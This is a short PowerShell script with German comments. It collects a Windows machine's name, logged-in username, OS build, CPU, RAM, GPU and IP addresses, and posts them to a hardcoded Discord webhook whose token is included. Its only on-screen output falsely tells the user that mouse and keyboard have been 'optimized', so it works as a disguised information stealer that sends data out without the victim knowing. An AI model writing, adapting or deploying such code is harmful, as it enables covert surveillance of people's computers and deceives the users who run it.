# Discord Webhook URL
$webhookUrl = "https://discordapp.com/api/webhooks/1406422085433167985/UT_c-WldcZ9ak2KsfJzPCV7V-U_30cakRwd84Mc_OzEN7TuF1DVhF2u9ZqCNG802jZ4_"

# --- Allgemeine PC Infos (nur für Discord) ---
$os = Get-CimInstance Win32_OperatingSystem
$cs = Get-CimInstance Win32_ComputerSystem
$cpu = Get-CimInstance Win32_Processor
$gpu = Get-CimInstance Win32_VideoController | Select-Object -First 1
$disks = Get-CimInstance Win32_LogicalDisk -Filter "DriveType=3"
$networkAdapters = Get-CimInstance Win32_NetworkAdapterConfiguration | Where-Object { $_.IPEnabled -eq $true }

# --- IP-Adressen ---
$ips = $networkAdapters | ForEach-Object { $_.IPAddress } | Where-Object { $_ -ne $null } | ForEach-Object { $_ -join ", " }

# --- Nachricht für Discord formatieren ---
$message = "```ini`n"
$message += "ComputerName = $($cs.Name)`n"
$message += "Username = $($env:USERNAME)`n"
$message += "OS = $($os.Caption) $($os.Version) Build $($os.BuildNumber)`n"
$message += "CPU = $($cpu.Name)`n"
$message += "RAM(GB) = $([math]::Round($cs.TotalPhysicalMemory / 1GB, 2))`n"
$message += "GPU = $($gpu.Name)`n"
$message += "IP = $($ips -join ', ')`n"
$message += "```"

# --- Senden an Discord ---
$body = @{
    content = $message
} | ConvertTo-Json

Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $body -ContentType "application/json"

# --- Anzeige auf dem eigenen Bildschirm ---
Write-Host "Maus und Tastatur Optimiert."
